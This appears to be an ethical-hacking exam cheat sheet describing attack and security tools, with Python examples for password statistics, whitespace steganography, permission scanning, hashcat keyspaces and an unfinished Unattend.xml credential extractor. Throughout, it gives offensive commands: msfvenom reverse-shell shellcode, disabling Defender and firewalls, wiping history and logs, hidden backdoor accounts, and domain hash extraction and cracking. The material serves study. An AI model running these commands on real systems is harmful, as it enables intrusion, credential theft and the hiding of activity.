
OpenVAS: OpenVAS is a framework of several services and tools offering a comprehensive
and powerful vulnerability scanning and vulnerability management solution.

John the Ripper: a password cracking tool that runs on multiple operating systems
such as Unix and Windows. It is helpful in detecting weak passwords in Unix
Unix environment. Besides several crypt(3) password hash types most commonly found
on various Unix systems, supported out of the box are Windows LM hashes, plus lots
of other hashes and ciphers in the community-enhanced version.

Nikto is an Open Source (GPL) web server scanner that performs comprehensive tests
against web servers for multiple items, including over 6700 potentially dangerous
files/programs, checks for outdated versions of over 1250 servers, and version
specific problems on over 270 servers. It also checks for server configuration
items such as the presence of multiple index files, HTTP server options, and will
attempt to identify installed web servers and software.

Havij is an automated SQL Injection tool that helps penetration testers to find and
exploit SQL Injection vulnerabilities on a web page.

Octoparse: Octoparse offers automatic data extraction, as it quickly scrapes web
data without coding and turns web pages into structured data. Attackers use
Octoparse to capture information from web pages, such as text, links, image URLs,
or HTML code.

Infoga: gathers email account information (IP, hostname, country, etc.) from
different public sources and checks whether an address appears in a known breach
using the haveibeenpwned.com API.

Splint: to detect the common security vulnerabilities including buffer overflows.

Maltego: to determine the relationships and real-world links between people, groups
of people, organizations, websites, Internet infrastructure, documents.

OllyDbg: OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft
Windows. Its emphasis on binary code analysis makes it particularly useful when the
source is unavailable. It debugs multithread applications and attaches to running
programs. It recognizes complex code constructs, such as a call to a jump to a
procedure.

BeRoot: a post-exploitation tool that checks for common misconfigurations which can
allow an attacker to escalate privileges.

Dependency Walker: useful for troubleshooting system errors related to loading and
executing modules. It detects many common application problems, such as missing
modules, invalid modules, import/export mismatches, and circular dependency errors.

Hashcat: Hashcat is a cracker compatible with multiple OSs and platforms that can
perform multi-hash (MD4, MD5, SHA-224/256/384/512, RIPEMD-160, etc.) and
multi-device password cracking.

Secure Shell Bruteforcer (SSB): a fast, simple SSH login brute-forcing tool used to
find accounts with weak SSH passwords.

Audio Spyware: sound surveillance software designed to record audio on a computer.
An attacker can install it silently, without the user's permission and without any
notification.

OmniHide Pro: to hide any secret file within an innocuous image, video, music file,
etc.

DeepSound: to hide/extract any secret data in/from audio files (WAV and FLAC). In
addition, it can encrypt the secret files, thereby enhancing security.

Fiddler: for performing web-application security tests such as the decryption of
HTTPS traffic and manipulation of requests using a MITM decryption technique.

CxSAST: Checkmarx CxSAST is a source-code analysis solution that provides tools for
identifying, tracking, and repairing technical and logical flaws in source code,
such as security vulnerabilities, compliance issues, and business logic problems.

PowerView: Attackers perform Active Directory (AD) enumeration to extract sensitive
information such as users, groups, domains, and other resources from the target AD
environment. Attackers enumerate AD using PowerShell tools such as PowerView.

AlienVault USM: AlienVault Unified Security Management (USM) offers powerful threat
detection, incident response, and compliance management across cloud, on-premises,
and hybrid environments.

THC-Hydra: THC Hydra is a parallelized network logon cracker that supports many
protocols (e.g., FTP, SSH, Telnet, HTTP(S), SMB, RDP, VNC, and several databases),
IPv6 targets, and internationalized passwords (SASLprep, RFC 4013). It is
proof-of-concept code that lets researchers and security consultants demonstrate
how easily unauthorized remote access to a system can be gained.

Medusa: a fast, parallel, modular network login brute-forcer, similar in purpose to
Hydra.

linpostexp: The linpostexp tool obtains detailed information on the kernel, which
can be used to escalate privileges on the target system.


Dylib Hijack Scanner: Dylib Hijack Scanner (DHS) is a simple utility that will scan
your computer for applications that are either susceptible to dylib hijacking or
have been hijacked.

DPAT: DPAT is a Python script that generates password use statistics from password
hashes dumped from a domain controller (DC) and a password crack file such as
hashcat.pot generated using the hashcat tool during password cracking.
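The statistics DPAT produces can be reproduced with a few dozen lines of Python. The
block below is an added example, not DPAT's own code: it reads the two inputs DPAT
consumes (secretsdump-style `DOMAIN\user:RID:LMHASH:NTHASH:::` lines and hashcat
potfile `NTHASH:plaintext` lines) and reports crack rate, password reuse, leftover LM
hashes, and a length histogram. The sample dump and potfile are constructed; the hash
values are placeholders, not real hashes.

```python
"""DPAT-style password statistics from an NTDS dump and a hashcat potfile.

Added example, not DPAT's own code. Sample data below is constructed; the NT
hashes are illustrative placeholder values, not real hashes.
"""
from collections import Counter

# LM hash of an empty password, i.e. "no LM hash stored" (LM storage disabled)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def parse_ntds(text: str) -> dict:
    """Map account -> (lm, nt) hashes; machine accounts (ending in $) are skipped."""
    accounts = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, lm, nt = parts[0], parts[2].lower(), parts[3].lower()
        if user.endswith("$"):
            continue
        accounts[user] = (lm, nt)
    return accounts


def parse_pot(text: str) -> dict:
    """Map NT hash -> plaintext. Split on the first ':' only, because the
    plaintext itself may contain colons."""
    cracked = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        h, plain = line.split(":", 1)
        cracked[h.strip().lower()] = plain
    return cracked


def stats(ntds_text: str, pot_text: str) -> dict:
    accounts = parse_ntds(ntds_text)
    cracked = parse_pot(pot_text)
    users_by_password = {}
    for user, (_, nt) in accounts.items():
        if nt in cracked:
            users_by_password.setdefault(cracked[nt], []).append(user)
    nt_counts = Counter(nt for _, nt in accounts.values())
    cracked_plains = [cracked[nt] for _, nt in accounts.values() if nt in cracked]
    n = len(accounts)
    return {
        "total": n,
        "cracked": len(cracked_plains),
        "percent_cracked": round(100.0 * len(cracked_plains) / n, 1) if n else 0.0,
        # accounts that still have an LM hash: crackable with -m 3000 in hours
        "lm_hash_present": sum(1 for lm, _ in accounts.values() if lm != EMPTY_LM),
        # same NT hash on several accounts = shared password, even if uncracked
        "shared_hashes": {nt: c for nt, c in nt_counts.items() if c > 1},
        "length_histogram": dict(sorted(Counter(map(len, cracked_plains)).items())),
        "top_passwords": sorted(((len(u), p) for p, u in users_by_password.items()),
                                reverse=True)[:5],
        "users_by_password": users_by_password,
    }


# Constructed sample input (made-up accounts; placeholder hash values)
SAMPLE_NTDS = """\
CORP\\alice:1104:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
CORP\\bob:1105:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
CORP\\carol:1106:0123456789abcdef0123456789abcdef:11111111111111111111111111111111:::
CORP\\dave:1107:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
CORP\\WKS01$:1108:aad3b435b51404eeaad3b435b51404ee:44444444444444444444444444444444:::
"""
SAMPLE_POT = """\
11111111111111111111111111111111:Summer2023!
22222222222222222222222222222222:pass:word
"""

if __name__ == "__main__":
    import json
    print(json.dumps(stats(SAMPLE_NTDS, SAMPLE_POT), indent=2))
```

Note that `shared_hashes` is computed from the hashes alone, so password reuse
between accounts is visible even before anything is cracked; `lm_hash_present`
flags accounts whose LM hash is still stored, which the LM mask attack further down
this page cracks exhaustively.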

Spytech SpyAgent: Spytech SpyAgent is computer spy software that allows you to
monitor everything users do on your computer—in total secrecy.

Scranos: Scranos is a rootkit-enabled trojan that masquerades as cracked software or
a legitimate application, such as anti-malware, a video player, or an ebook reader,
to infect systems. It exfiltrates data and steals credentials and intellectual
property, damaging the reputation of the target.

StegoStick: StegoStick is a steganographic tool that allows attackers to hide any
file in any other file.


Bloodhound: Bloodhound is a JavaScript web application that is built on top of
Linkurious and compiled using Electron, with a Neo4j database fed by a C# data
collector. Attackers use Bloodhound to easily identify complex attack paths in AD
environments.

Mimikatz: Mimikatz allows attackers to pass Kerberos TGT to other computers and
sign in using the victim’s ticket. The tool also helps in extracting plaintext
passwords, hashes, PIN codes, and Kerberos tickets from memory.

zsteg: The zsteg tool is used to detect stegano-hidden data in PNG and BMP image
files.

Veracode: to detect buffer overflow vulnerabilities.

GhostPack Seatbelt: to collect host information including PowerShell security
settings, Kerberos tickets, and items in the Recycle Bin.

Robber: to find executables prone to DLL hijacking.


crontab in Linux:
crontab <Filename> : Installs the file as the current user's crontab, replacing any
existing one
crontab -l : Lists the current user's crontab entries
crontab -r : Deletes the current user's crontab
crontab -u <Username> -r : Deletes the crontab of the specified user (requires root)
crontab -e : Edits the current user's crontab (e.g., to schedule software updates or
other recurring jobs)
crontab -u <Username> -e : Edits the crontab of the specified user (requires root)

nmap -T4 -A <target IP/network>: aggressive scan (OS and version detection, default
NSE scripts, traceroute). Attackers use it to identify RPC and other services
running on the network.

showmount -e <Target IP Address>: Attackers use this command to check whether any
NFS share is exported for mounting by the target host.

sudo mount -t nfs <Target IP Address>:/<Share Directory> /tmp/nfs: Attackers use
this command to mount the exported NFS directory from the target host locally.

ldns-walk @<IP of DNS Server> <Target domain>: walks the NSEC chain of a
DNSSEC-signed zone on the given server to enumerate its records (zone walking),
without needing a zone transfer.

NetVizor: NetVizor comes with an unparalleled activity recording feature set that
secretly records everything employees do on the network. Chats, keystrokes, emails,
website and online search activity, application usage, file usage, uploads and
downloads, software installations, and web traffic are just a sampling of NetVizor's
activity recording capabilities.

Stream Armor: Stream Armor is a tool used to discover hidden ADSs and clean them
completely from your system. Its advanced auto analysis, coupled with an online
threat verification mechanism, helps you eradicate any ADSs that may be present

GFI LanGuard: GFI LanGuard scans for, detects, assesses, and rectifies security
vulnerabilities in a network and its connected devices. This is done with minimal
administrative effort. It scans the operating systems, virtual environments, and
installed applications through vulnerability check databases

CCleaner: CCleaner is a system optimization, privacy, and cleaning tool. It allows
attackers to remove unused files and clean traces of Internet browsing details from
the target PC. With this tool, an attacker can very easily erase his/her tracks.

pwdump7: pwdump7 is an application that dumps the password hashes (one-way
functions or OWFs) from NT's SAM database. pwdump extracts LM and NTLM password
hashes of local user accounts from the Security Account Manager (SAM) database.


Snow: Snow is a program for concealing messages in text files by appending tabs and
spaces to the ends of lines, and for extracting messages from files containing
hidden messages. The user hides the data in the text file by appending sequences of
up to seven spaces, interspersed with tabs. This usually allows three bits to be
stored every eight columns. There is an alternative encoding scheme that uses
alternating spaces and tabs to represent 0s and 1s.
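The alternating space/tab scheme is simple enough to implement in a few lines. The
block below is an added example in that spirit and is not snow's code or its on-disk
format: each trailing space encodes a 0 bit and each trailing tab a 1 bit, eight bits
are appended per carrier line (an assumption; snow packs bits more densely), and a
16-bit length header tells the decoder where the payload ends. It also shows the
defender's side: a count of lines ending in whitespace, which is the tell for this
channel.

```python
"""Whitespace steganography in the style of snow's alternating space/tab scheme.

Added example, not snow's code or file format. One trailing space = bit 0,
one trailing tab = bit 1, appended after the visible text of each line.
A 16-bit big-endian length header precedes the payload. Existing trailing
whitespace in the carrier would corrupt the channel, so hide() strips it.
"""

SPACE, TAB = " ", "\t"
HEADER_BITS = 16        # payload length in bytes
BITS_PER_LINE = 8       # capacity used per carrier line (assumption)


def _to_bits(data: bytes) -> list:
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def _from_bits(bits: list) -> bytes:
    whole = len(bits) - len(bits) % 8
    return bytes(sum(bits[i + j] << (7 - j) for j in range(8))
                 for i in range(0, whole, 8))


def capacity_bytes(carrier: str) -> int:
    """Payload bytes that fit in the carrier after the length header."""
    lines = carrier.split("\n")
    return max(0, (len(lines) * BITS_PER_LINE - HEADER_BITS) // 8)


def hide(carrier: str, secret: bytes) -> str:
    """Return the carrier with `secret` encoded in trailing whitespace."""
    if len(secret) > capacity_bytes(carrier):
        raise ValueError("carrier too small for payload")
    if len(secret) >= 1 << HEADER_BITS:
        raise ValueError("payload exceeds 16-bit length header")
    bits = _to_bits(len(secret).to_bytes(2, "big")) + _to_bits(secret)
    out = []
    for line in carrier.split("\n"):
        chunk, bits = bits[:BITS_PER_LINE], bits[BITS_PER_LINE:]
        out.append(line.rstrip(" \t") + "".join(TAB if b else SPACE for b in chunk))
    return "\n".join(out)


def reveal(stego: str) -> bytes:
    """Recover the payload from trailing whitespace."""
    bits = []
    for line in stego.split("\n"):
        visible = line.rstrip(" \t")
        bits.extend(1 if ch == TAB else 0 for ch in line[len(visible):])
    length = int.from_bytes(_from_bits(bits[:HEADER_BITS]), "big")
    return _from_bits(bits[HEADER_BITS:HEADER_BITS + length * 8])


def trailing_whitespace_lines(text: str) -> int:
    """Detection heuristic: source files and prose rarely end many lines in
    whitespace, so a high count flags a possible whitespace channel."""
    return sum(1 for line in text.split("\n") if line != line.rstrip(" \t"))


if __name__ == "__main__":
    # Constructed carrier text
    carrier = "The quick brown fox\njumps over\nthe lazy dog\nand sleeps\nall day"
    stego = hide(carrier, b"hi")
    print(repr(stego))
    print(reveal(stego), trailing_whitespace_lines(stego))
```

Editors that strip trailing whitespace on save destroy the payload, which is both
the scheme's main fragility and the cheapest defensive control: normalizing
whitespace in files crossing a trust boundary removes the channel without having to
detect it.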

njRAT: njRAT is a RAT with powerful data-stealing capabilities. In addition to
logging keystrokes, it can access the victim's camera, steal credentials stored in
browsers, upload and download files, manipulate processes and files, and view the
victim's desktop.

PoisonIvy: PoisonIvy gives the attacker practically complete control over the
infected computer. The PoisonIvy remote administration tool is created and
controlled by a PoisonIvy management program or kit. The PoisonIvy kit consists of
a graphical user interface, and the backdoors are small (typically, <10 kB).

Necurs: is a distributor of many pieces of malware, most notably Dridex and Locky.
It delivers some of the worst banking Trojans and ransomware threats in batches of
millions of emails at a time, and it keeps reinventing itself. Necurs is
distributed by spam e-mails and downloadable content from questionable/illegal
sites. It is indirectly responsible for a significant portion of cyber-crime.

Hildegard: cloud malware designed to exploit misconfigured kubelets in a Kubernetes
cluster in order to infect all the containers in the Kubernetes environment.

Purple Fox Rootkit: The Purple Fox rootkit enables attackers to conceal malware on
targeted devices, making it difficult for security solutions to detect and remove
the malware. It is a sophisticated malware attack that targets Windows machines and
spreads its infection from one machine to another. The Purple Fox rootkit can be
distributed via a fake malicious Telegram installer.

Microdots: A microdot is text or an image considerably condensed in size (with the
help of a reverse microscope), up to one page in a single dot, to avoid detection by
unintended recipients. Microdots are usually circular, about one millimeter in
diameter, but can be made in different shapes and sizes.

Computer-based methods: A computer-based method makes changes to digital carriers to
embed information foreign to the native carriers. Communication of such information
occurs in the form of text, binary files, disk and storage devices, and network
traffic and protocols, and can alter software, speech, pictures, videos, or any
other digitally represented code for transmission.

Invisible ink: Invisible ink, or “security ink,” is one of the methods of technical
steganography. It is used for invisible writing with colorless liquids and can
later be made visible by certain pre-negotiated manipulations such as lighting or
heating. For example, if you use onion juice and milk to write a message, the
writing will be invisible, but when heat is applied, it turns brown and the message
becomes visible.

Spread spectrum: This technique is less susceptible to interception and jamming. In
this technique, communication signals occupy more bandwidth than required to send
the information. The sender increases the band spread by means of code (independent
of data), and the receiver uses a synchronized reception with the code to recover
the information from the spread spectrum data.

NTFS - Alternate Data Streams (ADS) to hide a file:

type C:\SecretFile.txt > C:\LegitFile.txt:SecretFile.txt
(SecretFile.txt is stored as a named stream attached to LegitFile.txt; dir and the
reported size of LegitFile.txt do not show it)

more < C:\LegitFile.txt:SecretFile.txt
(reads the hidden stream back)

dir /r C:\
(lists alternate data streams; available since Windows Vista)

Dreambot: can also be embedded as a macro in an MS Word document and sent to victims
via spam emails. If this Trojan gets into the victim's machine, it covertly creates
registry keys and processes and attempts to connect to multiple malicious C2
servers.

MoonBounce: a UEFI firmware implant (bootkit) concealed in the SPI flash of the
motherboard, so it runs before the operating system loads and survives OS
reinstallation and disk replacement.

GlitchPOS: point-of-sale (POS) malware that scrapes payment card data from memory.
It is distributed as a Trojan that masquerades as a cat game; the game is embedded
in the malware but is not displayed at the time of execution.

Restorator: Restorator is a utility for editing Windows resources in applications
and their components (e.g., files with .exe, .dll, .res, .rc, and .dcr extensions).
It allows you to change, add, or remove resources such as text, images, icons,
sounds, videos, versions, dialogs, and menus in nearly all programs. Using this
tool, one can achieve translation/localization, customization, design improvement,
and development.

File-System Commands:
find / -type f -perm -4000 -ls 2> /dev/null
Discovers SUID executables (use -perm -2000 for SGID; -perm -3000 would match only
files that have both bits set)

find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls
2> /dev/null
Discovers world-writable files

chmod o-w file
Removes write access for "others" from a file

find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls
2> /dev/null
Discovers world-writable directories

find / -name "*.txt" -ls 2> /dev/null
Discovers .txt files on the system

sudo -l
Displays the commands the current user is permitted (or forbidden) to run with sudo

openssl s_client -connect <hostname>:<port> -showcerts
Displays the details of every certificate in the server's chain

keytool -list -v -keystore keystore.jks
Displays the contents of a Java keystore file, including its alias names
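The find commands above are easy to get wrong because -perm takes an octal mode, and
-3000 (setuid and setgid together) is not the SUID check it is often assumed to be.
The block below is an added example, not part of the original cheat sheet: it
reproduces the SUID, SGID, and world-writable checks in Python over a constructed
directory tree, with the bit arithmetic made explicit, and prunes paths the way
`-path /proc -prune -o -path /sys -prune` does. It uses only os.chmod, so it runs
without root.

```python
"""Reproduce the SUID / SGID / world-writable find checks in Python.

Added example, not part of the cheat sheet. build_fixture() creates a
throwaway tree with os.chmod (setting the set-uid bit on your own regular
file does not require root); scan() walks it like the find commands above.
"""
import os
import stat
import tempfile


def is_suid(mode: int) -> bool:
    """find -type f -perm -4000: set-uid bit present (other bits may be too)."""
    return bool(mode & stat.S_ISUID)


def is_sgid(mode: int) -> bool:
    """find -type f -perm -2000."""
    return bool(mode & stat.S_ISGID)


def is_world_writable(mode: int) -> bool:
    """find -perm -o=w: the write bit for 'other' is set."""
    return bool(mode & stat.S_IWOTH)


def scan(root: str, prune=("/proc", "/sys")) -> dict:
    """Walk `root`, skipping pruned paths, and bucket findings like the find
    commands do. Paths are returned relative to root and sorted."""
    found = {"suid": [], "sgid": [], "world_writable_files": [],
             "world_writable_dirs": []}
    for dirpath, dirnames, filenames in os.walk(root):
        # -path /proc -prune -o -path /sys -prune: do not descend into these
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in prune]
        for name in dirnames:                       # -type d -perm -o=w
            full = os.path.join(dirpath, name)
            if is_world_writable(os.lstat(full).st_mode):
                found["world_writable_dirs"].append(os.path.relpath(full, root))
        for name in filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):        # -type f
                continue
            rel = os.path.relpath(full, root)
            if is_suid(st.st_mode):
                found["suid"].append(rel)
            if is_sgid(st.st_mode):
                found["sgid"].append(rel)
            if is_world_writable(st.st_mode):
                found["world_writable_files"].append(rel)
    for key in found:
        found[key].sort()
    return found


def build_fixture() -> str:
    """Constructed sample tree: one SUID binary, one world-writable file,
    one world-writable (sticky) directory, and one unremarkable file."""
    root = tempfile.mkdtemp(prefix="permscan_")
    for sub in ("usr/bin", "tmp", "home/user"):
        os.makedirs(os.path.join(root, sub))

    def touch(rel, mode):
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("x")
        os.chmod(path, mode)

    touch("usr/bin/passwd", 0o4755)          # SUID binary
    touch("tmp/notes.txt", 0o666)            # world-writable file
    touch("home/user/.bashrc", 0o644)        # nothing interesting
    os.chmod(os.path.join(root, "tmp"), 0o1777)   # world-writable dir
    return root


if __name__ == "__main__":
    import json
    print(json.dumps(scan(build_fixture()), indent=2))
```

On a real host, call `scan("/")` as the user whose privileges you are assessing; the
pruned paths keep the walk out of the pseudo file systems, exactly as the -prune
clauses in the find commands do.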
WMIC Commands:
wmic os where Primary='TRUE' reboot : Reboots Windows
wmic service get name,displayname,pathname,startmode > wmic_service.txt : Saves
the service names, display names, executable paths, and start modes to a file
wmic /node:"<Hostname>" product get name,version,vendor : Displays the details of
the software installed on the named (local or remote) host
wmic cpu get : Retrieves the processor's details
wmic useraccount get name,sid : Retrieves login names and their SIDs

Sysinternals Commands:
psexec -i \\<RemoteSystem> cmd
Opens an interactive CMD session on the remote system

psexec -i \\<RemoteSystem> -c file.exe
Copies file.exe from the local machine to the remote computer and runs it there

psexec -i -d -s c:\windows\regedit.exe
Launches regedit as SYSTEM (-s) on the local machine, which exposes the SAM and
SECURITY hives that are not readable by administrators

psexec -i \\<RemoteSystem> ipconfig /all
Displays a remote system's network configuration

Service Commands:
sc queryex type= service state= all
Lists all services (note the space after each "=")

sc queryex type= service state= all | find /i "SERVICE_NAME: myService"
Finds the specified service in the listing (sc qc <ServiceName> shows its
configuration)

net start <ServiceName> / net stop <ServiceName>
Starts/stops a service (net start with no argument lists running services)

netsh firewall show state
Displays the current firewall state (the legacy "netsh firewall" context is
deprecated since Windows Vista; use netsh advfirewall on current systems)

netsh firewall show config
Displays firewall settings

netsh advfirewall set currentprofile state off
Turns off the firewall for the current profile

netsh advfirewall set allprofiles state off
Turns off the firewall for all profiles

Information-Gathering Commands:
ps -ef : Lists all running processes with their process IDs (PIDs)
mount : Lists mounted file systems (with arguments, attaches a file system to the
directory tree)
route -n : Displays the routing table with addresses in numeric form
/sbin/ifconfig -a : Displays the network configuration of all interfaces
cat /etc/crontab : Displays the system-wide cron table
ls -la /etc/cron.d : Lists the cron job files installed by software packages
cat /etc/exports : Displays directories that are exported to NFS clients
cat /etc/redhat* /etc/debian* /etc/*release : Displays the OS version details
ls /etc/rc* : Lists boot-up services
egrep -e '/bin/(ba)?sh' /etc/passwd : Displays all the users who have shell access
ls -la ~/.ssh/ : Lists SSH keys, known_hosts, and authorized_keys, which reveal SSH
relationships and login details
cat /dev/null > ~/.bash_history && history -c && exit : Empties the saved Bash
history file, clears the in-memory history of the current shell, and exits (so the
shell does not write its history back on exit). Other open shells keep their own
in-memory history until they exit.

history -w : Writes the current shell's in-memory history to the history file,
overwriting it. Run after history -c, it empties the file; other shells are
unaffected until they write their own history.

export HISTSIZE=0 : Stops the Bash shell from keeping history. HISTSIZE is the
number of commands kept in memory; setting it to 0 disables history.

history -c : Clears the in-memory history of the current shell

adslist.exe: a third-party utility to list and manipulate hidden NTFS alternate data
streams.

Cipher.exe: Cipher.exe is a built-in Windows command-line tool that encrypts and
decrypts files on NTFS partitions (EFS). With cipher /w:<drive or folder> it
securely wipes the free space of the volume by overwriting it, so previously
deleted data cannot be recovered.

Auditpol.exe: Auditpol.exe is the command-line utility to change audit security
settings at the category and sub-category levels.

ATTRIB.exe: ATTRIB.exe displays or changes the file attributes of a victim's files so
that the attacker can access or hide them.

CMD/Shell:
net user <UserName> /add
Creates a new local user account on the victim system (the account is then hidden
with the next command)

net user <UserName> /active:no
Disables the account so that it is hidden while it is not required

net user <UserName> /active:yes
Re-enables the account for exploitation

attrib +h +s +r <FolderName>
Sets the hidden, system, and read-only attributes to hide a file or folder in
Windows (run with administrator privileges)

mkdir .HiddenMaliciousFiles
Creates a new hidden (dot-prefixed) folder on a Linux system

touch MaliciousFile.txt
Creates a file inside the hidden folder


Clear_Event_Viewer_Logs.bat / clearlogs.exe: to wipe out the event logs of the
target system.

Windows event log files (legacy .evt format of Windows 2000/XP/2003; Windows Vista
and later use .evtx files under C:\Windows\System32\winevt\Logs) that attackers
manipulate to cover their tracks:
SECEVENT.EVT (Security): failed logons, access to files without privileges
SYSEVENT.EVT (System): driver failures, components not operating correctly
APPEVENT.EVT (Application): application events

Regedit:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AppKey
stores the handlers for keyboard hotkeys (AppKeys).
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
holds the per-user file extension associations.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
maintains a list of files recently opened or saved via Windows Explorer-style
dialog boxes.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
records the volumes and network shares the user has mounted.

hashcat -a 3 -m 0 md5_hashes.txt ?l?l?l?d?d?d

Run the above command to crack MD5 passwords of exactly six characters in which the
first three are lowercase letters and the last three are digits.

run post/windows/gather/arp_scanner RHOSTS=<target subnet range>

An attacker uses the above Meterpreter command to detect live hosts in the target
network.

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337

Run the above command to find the exact offset, within a 3000-byte cyclic pattern
(generated with pattern_create.rb -l 3000), of the four bytes that landed in the
EIP register.

msfvenom -p windows/shell_reverse_tcp LHOST=<IP address> LPORT=<port>
EXITFUNC=thread -f c -a x86 -b "\x00"

Run the above msfvenom command to generate the shellcode in C array format,
avoiding the null byte (-b "\x00").

./hashcat.bin -m 3000 -a 3 users.ntds -1 ?a ?1?1?1?1?1?1?1 --increment

Run the above command to crack the LM hashes in users.ntds with a mask attack over
all printable characters (-1 ?a). LM hashes each half of the password (up to 7
characters) separately, so a 7-position mask with --increment covers the entire LM
keyspace. Cracked hashes are recorded in hashcat's potfile.
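Before launching either mask attack on this page (the ?l?l?l?d?d?d MD5 run above and
the 7-position ?a LM run here), it is worth knowing how many candidates the mask
generates. The block below is an added example, not hashcat code: it parses a hashcat
mask, including custom charsets given with -1 to -4 and the --increment option, and
returns the keyspace, using hashcat's built-in charset sizes (?l=26, ?u=26, ?d=10,
?s=33, ?a=95, ?h/?H=16).

```python
"""Keyspace arithmetic for hashcat mask attacks (-a 3).

Added example, not hashcat's code. Built-in charsets follow hashcat's
definitions; `custom` maps '1'..'4' to the charset specs given on the command
line with -1/-2/-3/-4 (each spec may itself use ?l, ?a, ... and literals).
"""
import string

BUILTIN = {
    "l": string.ascii_lowercase,              # 26
    "u": string.ascii_uppercase,              # 26
    "d": string.digits,                       # 10
    "s": " " + string.punctuation,            # 33: space plus 32 symbols
    "h": "0123456789abcdef",                  # 16
    "H": "0123456789ABCDEF",                  # 16
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]   # 95


def _tokens(spec: str, custom: dict) -> list:
    """Split a mask or charset spec into per-position charsets.
    '?x' is a named charset, '??' a literal '?', anything else a literal."""
    out, i = [], 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":
                out.append("?")
            elif key in custom:
                out.append(custom[key])
            else:
                out.append(BUILTIN[key])       # KeyError for an unknown charset
            i += 2
        else:
            out.append(spec[i])
            i += 1
    return out


def expand_charset(spec: str, custom: dict = None) -> str:
    """Expand a -1..-4 charset spec into its literal, de-duplicated set."""
    joined = "".join(_tokens(spec, custom or {}))
    return "".join(dict.fromkeys(joined))      # dedupe, keep first order


def parse_mask(mask: str, custom: dict = None) -> list:
    """Return one charset string per mask position."""
    expanded = {k: expand_charset(v) for k, v in (custom or {}).items()}
    return _tokens(mask, expanded)


def keyspace(mask: str, custom: dict = None, increment: bool = False,
             increment_min: int = 1) -> int:
    """Number of candidates hashcat will generate for the mask.
    With --increment, lengths increment_min..len(mask) are tried in turn,
    each using the corresponding prefix of the mask."""
    sets = parse_mask(mask, custom)
    lengths = range(increment_min, len(sets) + 1) if increment else [len(sets)]
    total = 0
    for n in lengths:
        product = 1
        for s in sets[:n]:
            product *= len(s)
        total += product
    return total


if __name__ == "__main__":
    print(keyspace("?l?l?l?d?d?d"))                                    # MD5 run above
    print(keyspace("?1?1?1?1?1?1?1", {"1": "?a"}, increment=True))     # LM run
```

The LM mask comes to about 7.0e13 candidates, which is tractable because LM (DES-based,
case-folded, 7-character halves) is so fast on GPUs; the same mask against NTLM (-m
1000) would only cover 7-character passwords, which is why DPAT-style statistics
matter when deciding what to run next.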

john --format=LM users.ntds

To crack the LM hashes with John the Ripper, run the above command.

ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q

Run the above command on the domain controller (DC) to create an Install-From-Media
(IFM) snapshot under c:\temp containing ntds.dit and the SYSTEM hive, from which the
password hashes can then be extracted offline. This requires sufficient free space
on the C: drive to store the output.

Set-MpPreference -DisableRealtimeMonitoring $true

Attackers can disable Windows Defender real-time monitoring using the above
PowerShell command before performing enumeration with the PowerView tool.

PowerView:
Get-DomainSID
Retrieves the security identifier (SID) of the current domain.

Get-NetDomain
Retrieves information about the current domain, including its domain controllers
(DCs).

(Get-DomainPolicy)."SystemAccess"
Retrieves the system access settings (password and lockout policy) of the domain
policy.

Get-NetGroup -UserName <"username">
Retrieves the groups the specified domain user is a member of.

C:\Windows\system32>nltest /domain_trusts: Attackers use this utility to enumerate
the trust relationships of the current domain. The trusted and trusting domains it
reveals become targets for pivoting and privilege escalation across trusts, for
example through Kerberoasting and pass-the-ticket attacks.

C:\Windows\Panther\UnattendGC\: Unattended installs allow administrators to deploy
Windows without manual intervention. The answer file (Unattend.xml) is often left
behind in this and similar locations (C:\Windows\Panther\,
C:\Windows\System32\Sysprep\) and may contain local administrator or auto-logon
credentials, either in plaintext or base64-encoded, which attackers harvest.
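The base64 in a leftover answer file is not encryption: the value is the password
with the literal string "Password" appended and then base64-encoded. The block below
is an added example, not part of the cheat sheet, that pulls every password out of an
Unattend.xml (AutoLogon, LocalAccount, and AdministratorPassword elements), reverses
the encoding, and handles both the UTF-16LE and plain-byte variants that Windows
System Image Manager produces. The list of candidate file paths and the sample answer
file (with made-up accounts and passwords) are assumptions constructed for the
example.

```python
"""Extract leftover credentials from an Unattend.xml.

Added example, not part of the cheat sheet. Windows Setup answer files keep
passwords in <AutoLogon>, <LocalAccount> and <AdministratorPassword>; when
<PlainText> is false, <Value> is base64(password + "Password"), encoded as
UTF-16LE by some components and as plain bytes by others. CANDIDATE_PATHS is
an assumption listing common leftover locations.
"""
import base64
import os
import xml.etree.ElementTree as ET

CANDIDATE_PATHS = [                                  # assumption: usual leftovers
    r"C:\Windows\Panther\Unattend.xml",
    r"C:\Windows\Panther\Unattend\Unattend.xml",
    r"C:\Windows\System32\Sysprep\Unattend.xml",
    r"C:\Windows\System32\Sysprep\sysprep.xml",
]
SUFFIX = "Password"


def _tag(elem) -> str:
    """Strip the urn:schemas-microsoft-com:unattend namespace from a tag."""
    return elem.tag.split("}", 1)[-1]


def encode_value(password: str, utf16: bool = False) -> str:
    """Obfuscate a password the way Setup expects (reverse of decode_value)."""
    data = (password + SUFFIX).encode("utf-16-le" if utf16 else "ascii")
    return base64.b64encode(data).decode("ascii")


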